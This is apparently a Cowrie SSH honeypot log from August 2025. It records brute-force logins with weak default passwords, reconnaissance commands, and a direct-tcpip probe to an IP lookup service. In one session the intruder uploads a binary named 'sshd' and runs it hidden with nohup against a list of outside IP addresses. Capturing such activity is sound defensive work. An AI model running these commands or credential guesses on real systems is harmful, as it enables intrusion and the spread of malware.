ha2-256","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98ddc5604ef6a1006a2b49a58759fbe6","sensor":"my-vps","timestamp":"2025-08-28T17:33:08.216274Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.login.success","username":"root","password":"ubuntu","message":"login attempt [root/ubuntu] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:33:08.332258Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":52774,"dst_ip":"1.2.3.4","dst_port":22,"session":"fc2621707ae1","protocol":"ssh","message":"New connection: 212.227.235.229:52774 (1.2.3.4:22) [session: fc2621707ae1]","sensor":"my-vps","timestamp":"2025-08-28T17:33:26.909654Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T17:33:26.910439Z","src_ip":"212.227.235.229","session":"fc2621707ae1"}
{"eventid":"cowrie.client.kex","hassh":"98f63c4d9c87edbd97ed4747fa031019","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 98f63c4d9c87edbd97ed4747fa031019","sensor":"my-vps","timestamp":"2025-08-28T17:33:27.015624Z","src_ip":"212.227.235.229","session":"fc2621707ae1"}
{"eventid":"cowrie.login.success","username":"root","password":"!QAZ@WSX","message":"login attempt [root/!QAZ@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:33:27.333147Z","src_ip":"212.227.235.229","session":"fc2621707ae1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:33:27.557590Z","src_ip":"212.227.235.229","session":"fc2621707ae1"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T17:33:27.558261Z","src_ip":"212.227.235.229","session":"fc2621707ae1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:33:27.664962Z","src_ip":"212.227.235.229","session":"fc2621707ae1"}
{"eventid":"cowrie.session.closed","duration":"0.8","message":"Connection lost after 0.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:33:27.666087Z","src_ip":"212.227.235.229","session":"fc2621707ae1"}
{"eventid":"cowrie.session.file_upload","filename":"sshd","outfile":"var/lib/cowrie/downloads/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","shasum":"94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","message":"SFTP Uploaded file \"sshd\" to var/lib/cowrie/downloads/94f2e4d8d4436874785cd14e6e6d403507b8750852f7f2040352069a75da4c00","sensor":"my-vps","timestamp":"2025-08-28T17:33:42.858446Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:33:42.987972Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.command.input","input":"chmod +x ./.1411309184620360364/sshd;nohup ./.1411309184620360364/sshd 107.174.131.51 103.101.52.115 111.170.168.6 5.189.157.5 45.45.239.129 45.150.33.79 62.210.130.180 157.255.155.179 191.96.11.220 45.251.115.48 107.172.235.77 107.172.50.186 219.153.109.99 47.79.43.177 47.109.28.100 186.13.21.145 46.38.143.201 38.242.249.184 159.203.90.99 170.84.39.236 192.227.247.47 192.3.232.251 120.71.0.7 47.111.15.68 66.206.224.115 23.94.70.51 82.180.154.188 14.103.158.69 112.217.86.2 147.182.249.14 158.51.96.38 207.154.207.65 139.59.253.66 117.173.76.160 219.153.125.102 107.172.250.121 86.54.42.8 43.247.68.87 79.120.74.12 103.174.130.66 50.3.189.189 103.186.97.118 188.166.211.175 103.192.198.89 106.13.59.117 85.9.121.232 138.197.74.207 140.249.192.235 47.96.158.82 160.19.205.25 41.225.238.233 &","message":"CMD: chmod +x ./.1411309184620360364/sshd;nohup ./.1411309184620360364/sshd 107.174.131.51 103.101.52.115 111.170.168.6 5.189.157.5 45.45.239.129 45.150.33.79 62.210.130.180 157.255.155.179 191.96.11.220 45.251.115.48 107.172.235.77 107.172.50.186 219.153.109.99 47.79.43.177 47.109.28.100 186.13.21.145 46.38.143.201 38.242.249.184 159.203.90.99 170.84.39.236 192.227.247.47 192.3.232.251 120.71.0.7 47.111.15.68 66.206.224.115 23.94.70.51 82.180.154.188 14.103.158.69 112.217.86.2 147.182.249.14 158.51.96.38 207.154.207.65 139.59.253.66 117.173.76.160 219.153.125.102 107.172.250.121 86.54.42.8 43.247.68.87 79.120.74.12 103.174.130.66 50.3.189.189 103.186.97.118 188.166.211.175 103.192.198.89 106.13.59.117 85.9.121.232 138.197.74.207 140.249.192.235 47.96.158.82 160.19.205.25 41.225.238.233 &","sensor":"my-vps","timestamp":"2025-08-28T17:33:42.988658Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/75ce06640a9bca68f0b112bbc2d8874c3ca321d93434336a0db9cffb07c65a6e","size":136,"shasum":"75ce06640a9bca68f0b112bbc2d8874c3ca321d93434336a0db9cffb07c65a6e","duplicate":false,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/75ce06640a9bca68f0b112bbc2d8874c3ca321d93434336a0db9cffb07c65a6e after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:33:43.026303Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.session.closed","duration":"34.8","message":"Connection lost after 34.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:33:43.027553Z","src_ip":"185.204.169.17","session":"dcc4f737821b"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":43738,"dst_ip":"1.2.3.4","dst_port":22,"session":"9e85e7c8dcd4","protocol":"ssh","message":"New connection: 212.227.125.160:43738 (1.2.3.4:22) [session: 9e85e7c8dcd4]","sensor":"my-vps","timestamp":"2025-08-28T17:34:01.170647Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:34:01.181220Z","src_ip":"212.227.125.160","session":"9e85e7c8dcd4"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:34:01.411474Z","src_ip":"212.227.125.160","session":"9e85e7c8dcd4"}
{"eventid":"cowrie.login.failed","username":"admin","password":"admin","message":"login attempt [admin/admin] failed","sensor":"my-vps","timestamp":"2025-08-28T17:34:03.171253Z","src_ip":"212.227.125.160","session":"9e85e7c8dcd4"}
{"eventid":"cowrie.session.closed","duration":"3.8","message":"Connection lost after 3.8 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:34:04.971985Z","src_ip":"212.227.125.160","session":"9e85e7c8dcd4"}
{"eventid":"cowrie.session.connect","src_ip":"217.72.205.35","src_port":65336,"dst_ip":"1.2.3.4","dst_port":22,"session":"cdd4cadc1196","protocol":"ssh","message":"New connection: 217.72.205.35:65336 (1.2.3.4:22) [session: cdd4cadc1196]","sensor":"my-vps","timestamp":"2025-08-28T17:34:10.954112Z"}
{"eventid":"cowrie.session.closed","duration":"0.0","message":"Connection lost after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:34:10.955239Z","src_ip":"217.72.205.35","session":"cdd4cadc1196"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":58400,"dst_ip":"1.2.3.4","dst_port":22,"session":"7992bea25b2c","protocol":"ssh","message":"New connection: 212.227.125.160:58400 (1.2.3.4:22) [session: 7992bea25b2c]","sensor":"my-vps","timestamp":"2025-08-28T17:34:16.878939Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-AsyncSSH_2.1.0","message":"Remote SSH version: SSH-2.0-AsyncSSH_2.1.0","sensor":"my-vps","timestamp":"2025-08-28T17:34:16.913395Z","src_ip":"212.227.125.160","session":"7992bea25b2c"}
{"eventid":"cowrie.client.kex","hassh":"fda360b1b4f4d3455cb75c6e7edb1d11","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,curve448-sha512,ecdh-sha2-nistp521,ecdh-sha2-nistp384,ecdh-sha2-nistp256,ecdh-sha2-1.3.132.0.10,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha256,diffie-hellman-group15-sha512,diffie-hellman-group16-sha512,diffie-hellman-group17-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,rsa2048-sha256,rsa1024-sha1,ext-info-c;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,aes192-cbc,aes128-cbc,3des-cbc,blowfish-cbc,cast128-cbc,arcfour256,arcfour128,arcfour;umac-64-etm@openssh.com,umac-128-etm@openssh.com,hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha1-etm@openssh.com,hmac-md5-etm@openssh.com,hmac-sha2-256-96-etm@openssh.com,hmac-sha2-512-96-etm@openssh.com,hmac-sha1-96-etm@openssh.com,hmac-md5-96-etm@openssh.com,umac-64@openssh.com,umac-128@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-md5,hmac-sha2-256-96,hmac-sha2-512-96,hmac-sha1-96,hmac-md5-96;zlib@openssh.com,zlib,none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","curve448-sha512","ecdh-sha2-nistp521","ecdh-sha2-nistp384","ecdh-sha2-nistp256","ecdh-sha2-1.3.132.0.10","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha256","diffie-hellman-group15-sha512","diffie-hellman-group16-sha512","diffie-hellman-group17-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","rsa2048-sha256","rsa1024-sha1","ext-info-c"],"keyAlgs":["ssh-ed25519-cert-v01@openssh.com","ssh-ed448-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-1.3.132.0.10-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ssh-ed25519","ssh-ed448","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","ecdsa-sha2-1.3.132.0.10","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","aes192-cbc","aes128-cbc","3des-cbc","blowfish-cbc","cast128-cbc","arcfour256","arcfour128","arcfour"],"macCS":["umac-64-etm@openssh.com","umac-128-etm@openssh.com","hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha1-etm@openssh.com","hmac-md5-etm@openssh.com","hmac-sha2-256-96-etm@openssh.com","hmac-sha2-512-96-etm@openssh.com","hmac-sha1-96-etm@openssh.com","hmac-md5-96-etm@openssh.com","umac-64@openssh.com","umac-128@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-md5","hmac-sha2-256-96","hmac-sha2-512-96","hmac-sha1-96","hmac-md5-96"],"compCS":["zlib@openssh.com","zlib","none"],"langCS":[""],"message":"SSH client hassh fingerprint: fda360b1b4f4d3455cb75c6e7edb1d11","sensor":"my-vps","timestamp":"2025-08-28T17:34:18.666537Z","src_ip":"212.227.125.160","session":"7992bea25b2c"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:34:20.339216Z","src_ip":"212.227.125.160","session":"7992bea25b2c"}
{"eventid":"cowrie.direct-tcpip.request","dst_ip":"ip-who.com","dst_port":80,"src_ip":"212.227.125.160","src_port":0,"message":"direct-tcp connection request to ip-who.com:80 from :0","sensor":"my-vps","timestamp":"2025-08-28T17:34:25.101621Z","session":"7992bea25b2c"}
{"eventid":"cowrie.direct-tcpip.data","dst_ip":"ip-who.com","dst_port":80,"data":"b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","id":0,"message":"discarded direct-tcp forward request 0 to ip-who.com:80 with data b'GET /json/ HTTP/1.1\\r\\nHost: ip-who.com\\r\\n\\r\\n'","sensor":"my-vps","timestamp":"2025-08-28T17:34:25.983005Z","src_ip":"212.227.125.160","session":"7992bea25b2c"}
{"eventid":"cowrie.session.closed","duration":"9.9","message":"Connection lost after 9.9 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:34:26.781329Z","src_ip":"212.227.125.160","session":"7992bea25b2c"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":63342,"dst_ip":"1.2.3.4","dst_port":22,"session":"7e852c0a59d3","protocol":"ssh","message":"New connection: 212.227.235.229:63342 (1.2.3.4:22) [session: 7e852c0a59d3]","sensor":"my-vps","timestamp":"2025-08-28T17:34:46.090019Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T17:34:46.090996Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T17:34:46.248795Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall","message":"login attempt [randall/randall] failed","sensor":"my-vps","timestamp":"2025-08-28T17:34:46.994924Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall1","message":"login attempt [randall/randall1] failed","sensor":"my-vps","timestamp":"2025-08-28T17:34:48.478040Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall123","message":"login attempt [randall/randall123] failed","sensor":"my-vps","timestamp":"2025-08-28T17:34:49.652093Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall1234","message":"login attempt [randall/randall1234] failed","sensor":"my-vps","timestamp":"2025-08-28T17:34:50.816258Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.login.failed","username":"randall","password":"randall12345","message":"login attempt [randall/randall12345] failed","sensor":"my-vps","timestamp":"2025-08-28T17:34:51.960417Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.session.closed","duration":"7.1","message":"Connection lost after 7.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:34:53.142869Z","src_ip":"212.227.235.229","session":"7e852c0a59d3"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":37250,"dst_ip":"1.2.3.4","dst_port":22,"session":"8e17cec277ce","protocol":"ssh","message":"New connection: 212.227.125.160:37250 (1.2.3.4:22) [session: 8e17cec277ce]","sensor":"my-vps","timestamp":"2025-08-28T17:35:03.185218Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.11.0","message":"Remote SSH version: SSH-2.0-libssh2_1.11.0","sensor":"my-vps","timestamp":"2025-08-28T17:35:03.186753Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.client.kex","hassh":"0079dec6da0c13e5e8d1ea56ca556b64","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group16-sha512,diffie-hellman-group18-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,diffie-hellman-group-exchange-sha1,ext-info-c;aes256-ctr,aes192-ctr,aes128-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-256-etm@openssh.com,hmac-sha2-512,hmac-sha2-512-etm@openssh.com,hmac-sha1,hmac-sha1-etm@openssh.com,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group16-sha512","diffie-hellman-group18-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","diffie-hellman-group-exchange-sha1","ext-info-c"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","rsa-sha2-512","rsa-sha2-256","ssh-rsa","ssh-rsa-cert-v01@openssh.com","ssh-dss"],"encCS":["aes256-ctr","aes192-ctr","aes128-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-256-etm@openssh.com","hmac-sha2-512","hmac-sha2-512-etm@openssh.com","hmac-sha1","hmac-sha1-etm@openssh.com","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0079dec6da0c13e5e8d1ea56ca556b64","sensor":"my-vps","timestamp":"2025-08-28T17:35:03.516972Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.login.failed","username":"root","password":"root","message":"login attempt [root/root] failed","sensor":"my-vps","timestamp":"2025-08-28T17:35:05.113285Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.login.success","username":"root","password":"admin","message":"login attempt [root/admin] succeeded","sensor":"my-vps","timestamp":"2025-08-28T17:35:06.446055Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:07.553904Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"/ip cloud print","message":"CMD: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T17:35:07.554615Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.failed","input":"/ip cloud print","message":"Command not found: /ip cloud print","sensor":"my-vps","timestamp":"2025-08-28T17:35:07.555063Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","size":30,"shasum":"b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/b846225e0081fa9151eb29ac62be1dea60bb9c567dba6c3ca3b1c6169b6d750d after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:07.886188Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:08.566655Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"ifconfig","message":"CMD: ifconfig","sensor":"my-vps","timestamp":"2025-08-28T17:35:08.567437Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","size":901,"shasum":"1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/1d6f385dd0e7ccc3ada3e24e973fd850470dbb222547ea0c1cb7c9f6d9e1dc5e after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:08.899193Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:09.622700Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"uname -a","message":"CMD: uname -a","sensor":"my-vps","timestamp":"2025-08-28T17:35:09.623604Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","size":80,"shasum":"28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/28ba533b0f3c4df63d6b4a5ead73860697bdf735bb353e4ca928474889eb8a15 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-28T17:35:09.955169Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T17:35:10.672324Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
{"eventid":"cowrie.command.input","input":"cat /proc/cpuinfo","message":"CMD: cat /proc/cpuinfo","sensor":"my-vps","timestamp":"2025-08-28T17:35:10.672998Z","src_ip":"212.227.125.160","session":"8e17cec277ce"}
